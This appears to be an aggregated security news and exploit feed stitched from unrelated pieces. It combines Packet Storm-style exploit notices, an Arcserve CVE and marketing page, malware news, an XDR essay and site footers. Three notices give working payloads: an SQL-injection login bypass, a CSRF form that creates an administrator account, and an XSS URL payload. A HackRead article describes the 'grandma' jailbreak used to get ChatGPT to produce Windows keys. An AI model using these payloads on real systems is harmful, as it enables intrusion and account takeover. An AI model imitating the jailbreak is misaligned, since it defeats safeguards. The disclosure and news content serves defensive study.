Anuranan SBAdmin version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Anuranan SBAdmin v2.0 Auth By Pass Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 113.0.1 (64 bits)                                          | | # Vendor    : https://anuranangroup.com/                                                                                         |  | # Dork      : Created by: Anuranan Group                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user&pass= ' or 0=0 # [+] http://127.0.0.1/ipedexcellencecom/kontlo/index.php====Greetings to :=======================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh    |=========================================================================================================================================

Anuranan SBAdmin 2.0 SQL Injection

Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.

One platform with every **data protection capability you need**, without the complexity you don’t.

_**See what's new in UDP 9**_

Request Demo

Customer Profile **Midmarket and Enterprise**

Partner Profile **VAR**

**Unify Protection and Prevent Cyberattacks Across On- and Off-Premises Workloads, and Orchestrate Recovery**

Ransomware has become a big business for cybercriminals. You do not want to be their “customer.” Your organization risks losing not only money but also irreplaceable data, time, and brand reputation.

You need to protect your company’s business systems and data from attacks or loss, along with the increased resiliency that can only come from simplifying processes across all storage platforms, whether local, virtual, or cloud. What you don’t need is more products to manage.

Arcserve Unified Data Protection (UDP) software delivers an all-in-one data and ransomware protection solution to neutralize ransomware attacks, restore data, and perform effective disaster recovery (DR).

Safeguarded by Sophos Intercept X Advanced cybersecurity, Arcserve UDP uniquely combines deep-learning server protection, immutable storage, and scalable onsite and offsite business continuity for a multilayered approach that delivers complete IT resiliency for your virtual, physical, and cloud infrastructures.

**Watch Video →**

**What IT Pros Have to Say About Arcserve UDP**

"Impressive data protection tool with user-friendly interface,             
comprehensive features, excellent performance and reliable support.             
Highly recommended!"

Read this review and more on Gartner Peer Insights.

  
_Gartner Peer Insights reviews constitute the subjective opinions of individual end users based on their own experiences and do not represent the views of Gartner or its affiliates._

**Repel Ransomware and Recover Rapidly**

**Arcserve UDP** Secured by Sophos delivers comprehensive data protection and cybersecurity for your **critical backup** infrastructure. Orchestrated recovery reduces recovery time and point objectives **(RTOs/RPOs)** to minutes and validates service-level agreements (SLAs) with **Assured Recovery**.

Now You Can:

*   Protect against data loss and extended downtime across cloud, local, virtual, hyperconverged, and SaaS-based workloads
*   Prevent ransomware attacks on critical disaster recovery infrastructure with available Sophos Intercept X Advanced for Server. Assure immutability of data backups with support of Amazon AWS S3 Object Lock
*   Reduce your downtime from days to minutes, and validate recovery time and point objectives (RTOs/RPOs) and service-level agreements (SLAs) with automated testing and granular reporting
*   Restore faster with instant VM and bare metal recovery (BMR), local and remote virtual standby, application-consistent backup and granular restore, hardware snapshot support, and extensions delivering high availability and tape support
*   Accelerate time-to-value without the need for extensive training or costly professional services. Deploy in minutes and reclaim up to 50 percent more time
*   Protect Microsoft 365 workloads (Exchange Online, Teams, SharePoint Online, and OneDrive for Business) **on-premises**, using Arcserve UDP, which offers deep data reduction, granular recovery, offsite replication, and more
*   Enjoy management flexibility with either a multi-tenant, cloud-based management console or a private management console to suit operational needs

> "Arcserve UDP is designed to bring technologies together in a way that simplifies the infrastructure running a combination of on-premises, virtual, and SaaS-based applications and systems. Without a comprehensive solution spanning these different application environments, organizations may be susceptible to downtime and data loss."

**How It Works**

Arcserve UDP Secured by Sophos provides ransomware-free IT, enabling you to protect critical data from cyberattacks; detect and reverse ransomware encryption; respond with a “no” to ransom demands; and recover all your systems and data safely.

Easily scale hybrid business continuity topologies, locally or over long distances with multiple sites, including service and cloud providers. Installation is done in a few clicks. Create data stores on the recovery point server, add the nodes you want to protect, a storage destination, and a plan. Perform jobs such as backup, virtual standby, and replicate. Perform a simple restore or a bare metal recovery.

Back up to either a local machine or a central recovery point server (RPS) with global, source-side deduplication. A destination can be an RPS, local folder, or remote shared folder. Add network CIFS/NFS shares, Office 365 Exchange, or SharePoint online nodes, and create related tasks.

Fully protect a broad range of platforms, including: Windows, Linux, Amazon EC2, Microsoft Azure, Office 365 (Exchange Online, Teams, SharePoint Online and OneDrive for Business), Microsoft Exchange, MS SQL, file servers, Microsoft IIS, Microsoft Active Directory, Oracle Database with native RMAN support, VMware vSphere (agentless), and Microsoft Hyper-V (agentless), along with support of Nutanix Objects and Nutanix Files for protection of Nutanix HCI.

**Customer Success Spotlight**

**Colton Computer Technologies Scales Up With Arcserve to Meet Demand for Business Continuity**

"We have invested in Arcserve UDP over the years ... to support the needs of our customers. We have full confidence in Arcserve as a future-proof solution, and one that has proven time and again to allow us to quickly restore data."

– Mitch Colton, Managing Director, Colton Computer Technologies

**Hillbrook Anglican School Gains Peace of Mind With Arcserve**

Hillbrook Anglican School has fail-safe data backup and recovery with technology provider Cymax's deployment of Arcserve solutions. 

**The Arcserve Advantage**

**Created With the Utmost in Usability and Design**

Like all our solutions, Arcserve UDP was developed to deliver a consumer-grade user experience. That’s why you can manage its robust capabilities with a few quick clicks on a single interface from anywhere in the world.

**Backed by Deeply Knowledgeable Product Support**

Our teams are among the most experienced in the data protection industry – expertise we pour into supporting our customers and partners.

**Profitable for Channel Partners and Cloud Service Providers**

Channel partners and managed service providers can profitably adopt and manage Arcserve UDP to support customers who have limited resources but require secure backup and disaster recovery (DR) for complex, hybrid IT infrastructures.

**Who Chooses Arcserve?**

**Related Resources**

CVE-2023-26258: UDP Software | Unified Data Protection for On- and Off-Premises Workloads - Arcserve

XEL CMS version 1.1 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : XEL cms© v1.1 CSRF Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://cyberxel.com                                                                                               |  | # Dork      : "contact at: +91-98144 06799, z91-161-2408274 email: info@cyberxel.com"                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Admin Panel : /xelcms/[+] infected file : /xelcms/user/adduser.php[+] line 07 set your target.[+] save code as poc.html    <style>@import 'http://cyberxel.com/xelcms/styles/main.css';#form1 table {  font-size: 12px;} </style><link href="http://cyberxel.com/xelcms/fckeditor/_samples/sample.css" rel="stylesheet" type="text/css" /><span class=td><img src="http://cyberxel.com/xelcms/dzimages/arrowpath.gif" />&nbsp;<a href="users.php" class=td>Users</a> <img src="http://cyberxel.com/xelcms//dzimages/arrowpath2.gif" />&nbsp;Add user</h2> </span><br><br><form id="form1" name="form1" method="post" action="TARGET_SITE/xelcms/user/adduser.php">  <table width="99%" border="0" cellpadding="2" cellspacing="2">    <tr>      <td width="8%">Username:</td>      <td width="92%"><label>        <input name="username" type="text" id="username" style="font-size: 10px;width:300" />      </label></td>    </tr>    <tr>      <td>Password:</td>      <td><label>        <input name="password" type="password" id="password" style="font-size: 10px;width:300" />      </label></td>    </tr>  <tr>      <td>Confirm password:</td>      <td><label>        <input name="password2" type="password" id="password2" style="font-size: 10px;width:300" />      </label></td>    </tr>    <tr>      <td>Type:</td>      <td><label>        <select name="type" id="type" style="font-size: 10px;width:300">          <option value="" selected></option>      <option value="Administrator">Administrator</option>          <option value="User">User</option>        </select>      </label></td>    </tr>    <tr>      <td>&nbsp;</td>      <td>        <input type="submit" name="Submit" value="Create user" style="font-size: 10px;" />      </td>    </tr>  </table></form>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

XEL CMS 1.1 Cross Site Request Forgery

By Waqas
A Twitter user successfully utilized the "grandma exploit" to trick ChatGPT and acquire multiple Windows 10 codes.
This is a post from HackRead.com Read the original post: ChatGPT tricked into generating Windows 10 and Windows 11 keys

**The Twitter account of the user who managed to generate Windows activation keys on ChatGPT and Google Bard has been suspended.**

ChatGPT, the popular artificial intelligence (AI) chatbot, is at the centre of controversy as users uncover a potential security loophole. As one of the fastest-growing AI services globally, ChatGPT has gained immense popularity for its diverse functionalities. However, recent reports suggest that some users have managed to bypass certain safety measures, including the so-called “grandma” exploit.

The exploit involves leveraging ChatGPT’s capabilities to extract Windows 10 Pro keys. Astonishingly, one user successfully utilized the grandma exploit to obtain multiple Windows 10 codes, which were initially perceived as legitimate. Intrigued by this discovery, the user continued to request codes for upgrading from Windows 11 Home to Windows 11 Pro.

It all started on June 17th, 2023, when a Twitter user going by the handle of @immasiddtweets, (their Twitter account has been suspended now but here is the archived link to their now deleted tweets), claimed to have successfully generated Windows 10 Pro keys by engaging with OpenAI’s AI-powered chatbot, ChatGPT.

The user requested the chatbot to read out the keys as a way to reminisce about their deceased grandmother. Surprisingly, the chatbot responded compassionately and provided five unique Windows 10 Pro keys at no cost.

Out of curiosity, @immasiddtweets went a step further and showcased how they utilized Google Bard and ChatGPT to upgrade from Windows 11 Home to Windows 11 Pro. However, TechRadar revealed a crucial detail—the generated product keys were generic in nature.

Consequently, while it remains possible to install or upgrade Windows using these keys, users may encounter limitations and miss out on certain features available in the full Windows 11 experience.

ChatGPT and Google Bard AI generating Windows Keys for @immasiddtweets (Image: Hackread.com)

Here is a series of Tweets from users generating keys for Windows 10 and Windows 11:

*   1: “Worked on Bing too bruv, and said it so confident,” said one user while sharing a screenshot of the generated keys
*   2: ”So True,” tweeted a user with a screenshot of generated keys.
*   3: For some users, ChatGPT also generated API keys.
*   4: ”Bing fell into the trap,” said one tweet.

However, according to Windows Central, when their researchers headed to Microsoft’s Bing AI chatbot to generate Windows keys, the chatbot came up with no keys but offered words of wisdom about piracy and how such products should be bought from original sources.

Nevertheless, to ensure the integrity of their services, both ChatGPT and Google Bard have implemented robust measures to prevent users from generating unauthorized product keys. As users navigate the digital realm, it is vital to exercise caution and seek legitimate avenues for obtaining product keys, ensuring a genuine and uninterrupted Windows experience.

**RELATED ARTICLES**

1.  Europol warns of ChatGPT exploitation
2.  OpenAI ChatGPT Bug Bounty Program – Earn $200 to $20k
3.  DarkBERT: Enhancing Cybersecurity Efforts on the Dark Web
4.  100,000 Hacked ChatGPT Accounts Discovered on Dark Web
5.  ChatGPT’s False Information Generation Enables Code Malware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChatGPT tricked into generating Windows 10 and Windows 11 keys

In yet another sign of a lucrative crimeware-as-a-service (CaaS) ecosystem, cybersecurity researchers have discovered a new Windows-based information stealer called Meduza Stealer that's actively being developed by its author to evade detection by software solutions.
"The Meduza Stealer has a singular objective: comprehensive data theft," Uptycs said in a new report. "It pilfers users' browsing

In yet another sign of a lucrative crimeware-as-a-service (CaaS) ecosystem, cybersecurity researchers have discovered a new Windows-based information stealer called **Meduza Stealer** that's actively being developed by its author to evade detection by software solutions.

"The Meduza Stealer has a singular objective: comprehensive data theft," Uptycs said in a new report. "It pilfers users' browsing activities, extracting a wide array of browser-related data."

"From critical login credentials to the valuable record of browsing history and meticulously curated bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable."

Despite the similarity in features, Meduza boasts of a "crafty" operational design that eschews the use of obfuscation techniques and promptly terminates its execution on compromised hosts should a connection to the attacker's server fail.

It's also designed to abort if a victim's location is in the stealer's predefined list of excluded countries, which consists of the Commonwealth of Independent States (CIS) and Turkmenistan.

Meduza Stealer, besides gathering data from 19 password manager apps, 76 crypto wallets, 95 web browsers, Discord, Steam, and system metadata, harvests miner-related Windows Registry entries as well as a list of installed games, indicating a broader financial motive.

It's currently being offered for sale on underground forums such as XSS and Exploit.in and a dedicated Telegram channel as a recurring subscription that costs $199 per month, $399 for three months, or $1,199 for a lifetime license. The information pilfered by the malware is made available through a user-friendly web panel.

"This feature allows subscribers to download or delete the stolen data directly from the web page, granting them an unprecedented level of control over their ill-gotten information," the researchers said.

"This in-depth feature set showcases the sophisticated nature of the Meduza Stealer and the lengths its creators are willing to go to ensure its success."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Evasive Meduza Stealer Targets 19 Password Managers and 76 Crypto Wallets


An unquoted Windows search path vulnerability existed in the install the MOVE 4.10.x and earlier Windows install service (mvagtsce.exe). 
The misconfiguration allowed an unauthorized local user to insert arbitrary code into the unquoted service path to obtain privilege escalation and stop antimalware services.



CVE-2023-3438

Threat actors associated with the BlackCat ransomware have been observed employing malvertising tricks to distribute rogue installers of the WinSCP file transfer application.
"Malicious actors used malvertising to distribute a piece of malware via cloned webpages of legitimate organizations," Trend Micro researchers said in an analysis published last week. "In this case, the distribution

Threat actors associated with the BlackCat ransomware have been observed employing malvertising tricks to distribute rogue installers of the WinSCP file transfer application.

"Malicious actors used malvertising to distribute a piece of malware via cloned webpages of legitimate organizations," Trend Micro researchers said in an analysis published last week. "In this case, the distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer."

Malvertising refers to the use of SEO poisoning techniques to spread malware via online advertising. It typically involves hijacking a chosen set of keywords to display bogus ads on Bing and Google search results pages with the goal of redirecting unsuspecting users to sketchy pages.

The idea is to trick users searching for applications like WinSCP into downloading malware, in this instance, a backdoor that contains a Cobalt Strike Beacon that connects to a remote server for follow-on operations, while also employing legitimate tools like AdFind to facilitate network discovery.

The access afforded by Cobalt Strike is further abused to download a number of programs to conduct reconnaissance, enumeration (PowerView), lateral movement (PsExec), bypass antivirus software (KillAV BAT), and exfiltrate customer data (PuTTY Secure Copy client). Also observed is the use of the Terminator defense evasion tool to tamper with security software by means of a Bring Your Own Vulnerable Driver (BYOVD) attack.

In the attack chain detailed by the cybersecurity company, the threat actors managed to steal top-level administrator privileges to conduct post-exploitation activities and attempted to set up persistence using remote monitoring and management tools like AnyDesk as well as access backup servers.

"It is highly likely that the enterprise would have been substantially affected by the attack if intervention had been sought later, especially since the threat actors had already succeeded in gaining initial access to domain administrator privileges and started establishing backdoors and persistence," Trend Micro said.

The development is just the latest example of threat actors leveraging the Google Ads platform to serve malware. In November 2022, Microsoft disclosed an attack campaign that leverages the advertising service to deploy BATLOADER, which is then used to drop Royal ransomware.

It also comes as Czech cybersecurity company Avast released a free decryptor for the fledgling Akira ransomware to help victims recover their data without having to pay the operators. Akira, which first appeared in March 2023, has since expanded its target footprint to include Linux systems.

"Akira has a few similarities to the Conti v2 ransomware, which may indicate that the malware authors were at least inspired by the leaked Conti sources," Avast researchers said. The company did not disclose how it cracked the ransomware's encryption algorithm.

The Conti/TrickBot syndicate, aka Gold Ulrick or ITG23, shut down in May 2022 after suffering a series of disruptive events triggered by the onset of the Russian invasion of Ukraine. But the e-crime group continues to exist to this date, albeit as smaller entities and using shared crypters and infrastructure to distribute their warez.

IBM Security X-Force, in a recent deep dive, said the gang's crypters, which are applications designed to encrypt and obfuscate malware to evade detection by antivirus scanners and hinder analysis, are being used to also disseminate new malware strains such as Aresloader, Canyon, CargoBay, DICELOADER, Lumma C2, Matanbuchus, Minodo (formerly Domino), Pikabot, SVCReady, Vidar.

"Previously, the crypters were used predominantly with the core malware families associated with ITG23 and their close partners," security researchers Charlotte Hammond and Ole Villadsen said. "However, the fracturing of ITG23 and emergence of new factions, relationships, and methods, have affected how the crypters are used."

Despite the dynamic nature of the cybercrime ecosystem, as nefarious cyber actors come and go, and some operations partner together, shut down, or rebrand their financially motivated schemes, ransomware continues to be a constant threat.

This includes the emergence of a new ransomware-as-a-service (RaaS) group called Rhysida, which has primarily singled out education, government, manufacturing, and technology sectors across Western Europe, North and South America, and Australia.

"Rhysida is a 64-bit Portable Executable (PE) Windows cryptographic ransomware application compiled using MINGW/GCC," SentinelOne said in a technical write-up. "In each sample analyzed, the application's program name is set to Rhysida-0.1, suggesting the tool is in early stages of development."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

BlackCat Operators Distributing Ransomware Disguised as WinSCP via Malvertising

XDR can lower platform costs and improve detection, but it requires committing to a few principles that go against the established way of thinking about SOC.

The cyber security operation center (SOC) model's focus has shifted to extended detection and response (XDR). Architected correctly, XDR puts less pressure and cost on the security information and event management (SIEM) system to correlate complex security alerts. It also does a better job as a single pane of glass for ticketing, alerting, and orchestrating automation and response.

XDR is a real opportunity to lower platform costs and improve detection, but it requires committing to a few principles that go against the established way of thinking about SOCs.

**Intelligent Data Pipelines and Data Lakes Are a Necessity**

_**Takeaway: A security data pipeline can remove log waste prior to storage and route logs to the most appropriate location.**_

Managing your security data pipeline intelligently can have a massive impact on controlling spending by preprocessing every log and eliminating excess waste, especially when your primary cost driver is GB per day. Consider the following example showing the before and after size of Windows Active Directory (AD) logs.

    

The average inbound event had 75 fields and a size of 3.75KB. After removing redundant and unnecessary fields, the log has 30 fields and a size of 1.18KB. That is a 68.48% reduction of SIEM storage cost.

Applying similar value analysis for where you send each log is equally important. Not all logs should be sent to the SIEM! Only logs that drive a known detection should be sent to SIEM. All others used in supporting investigations, enrichment, and threat hunting should go to the security data lake. An intelligent data pipeline can make on-the-fly routing decisions for each log and further reduce your costs.

    

    

**Focus Detection and Prevention Closest to the Threat**

_**Takeaway: Product-native detections have gotten dramatically better; the SIEM should be a last line of defense.**_

The SIEM used to be one of the only tools that could correlate and analyze raw logs and identify alerts that need to be addressed. This was largely a reflection of other tools being single-purpose and generally bad at identifying issues by themselves. As a result, it made sense to ship everything to the SIEM and create complex correlation rules to sort the signal from the noise.

Today's landscape has changed with endpoint detection and response (EDR) tools. Modern EDR is essentially SIEM on the endpoint. It has the same capabilities to write detection rules on endpoints as the SIEM has, but now there is no need to ship every bit of telemetry data into the SIEM.

EDR vendors have gotten markedly better at building and maintaining out-of-the-box detections. We have consistently seen a sizable decrease in detections and preventions attributed to the SIEM during our purple team engagements in favor of tools like EDR and next-generation firewalls (NGFW). There are exceptions like Kerberoasting (which on-premises AD doesn't have much coverage for). As you move to pure cloud for AD, even those types of detections will be handled by "edge" tools like Microsoft Defender for Endpoint.

**Play to Your SIEM Strong Suit**

_**Takeaway: Having a deliberate process to consistently measure and improve your detection capabilities is far more valuable than having any specific SIEM tool on the market.**_

Purple teaming across industries and detection ecosystems has allowed us to understand the efficacy of many modern EDR, NGFW, SIEM, and other tools. We score and benchmark purple team results and trend the improvements over time. We have found over the past five years that the SIEM you buy has no measurable correlation to purple team scores. Process, tuning, and testing are what matter.

SIEM tools have architectural differences that can make one a better or worse fit for your environment, but buying a specific SIEM to significantly improve your detection capabilities will not prove out. Instead, focus your efforts on dashboards and correlations that support threat-hunt and incident-response efforts.

**Align EDR, SIEM, and SOAR in Your XDR Architecture**

_**Takeaway: Security automation and artificial intelligence (AI)-enhanced triage is the future but should be approached with caution. Not all automation needs to exclude all human involvement.**_

The future of XDR is coupled with tightly integrated security orchestration, automation, and response (SOAR) technologies. XDR concepts recognize that what really matters is **not how fast you can detect a threat, but how fast you can neutralize a threat.** _"If this – then that"_ SOAR automation methodologies aren't effective in real-world scenarios. One of the best approaches we've seen in XDR automation is:

*   Conduct a purple team exercise to identify which current detection events are optimized (very low false positive rates) and can be trusted with an automated response.
*   Create an automated response playbook but insert human intervention steps to gain confidence before you turn it fully over to automation. We call this "semi-automation," and it's a smart first step.

XDR is a buzzword, but when viewed in a technology-agnostic fashion, it is based on good foundations. Where organizations are most likely to fail is applying legacy SIEM management philosophies to modern XDR architectures. These program design philosophies will likely improve your capabilities and reduce your costs.

**About the Author**

    

Mike Pinch joined Security Risk Advisors in 2018 after serving 6 years as the Chief Information Security Officer at the University of Rochester Medical Center. Mike is nationally recognized as a leader in the field of cybersecurity, has spoken at conferences including HITRUST, H-ISAC, and has contributed to national standards for health care and public health sector cybersecurity frameworks. Mike focuses on GCP, AWS, and Azure security, primarily in helping SOC teams improve their capabilities. Mike is an active developer and is currently enjoying weaving modern AI technologies into common cybersecurity challenges.

Architecting XDR to Save Money and Your SOC's Sanity

Categories: News
A list of topics we covered in the week of June 26 to July 2 of 2023



(Read more...)




The post A week in security (June 26 - July 2) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (June 26 - July 2)

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

**Strawberry 1.1.9 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 5006ad4fe5ee6631967fbcda59c50822e4f6cf4db227a33b6f3fba8640dbb942

Download | Favorite | View

**Strawberry 1.1.9 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Strawberry 1.1.9 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://cutenewsru.sourceforge.io/strawberry/                                                                      |  | # Dork      : "Powered by Strawberry 1.1.9"                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"[+] http://127.0.0.1/dverekomondoorcom/content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Tag

#windows